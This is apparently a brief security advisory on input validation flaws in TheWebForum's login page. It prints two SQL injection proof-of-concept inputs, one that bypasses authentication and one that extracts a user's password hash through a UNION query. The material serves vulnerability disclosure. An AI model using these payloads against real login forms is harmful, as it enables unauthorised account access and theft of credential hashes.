|
TheWebForum Multiple Input Validation Vulnerabilities
An exploit is not required. The following proof of concept examples are available: Authentication bypass example (SQL Injection): http://www.example.com/twf/login.php User Name: a' or 'a'='a'/* Password: anypassword Get user's password hash example (SQL Injection): http://www.example.com/twf/login.php User Name: a' union select N,password, 3 from users/* User name will contain password's hash of user with ID=N |
|
|
Privacy Statement |
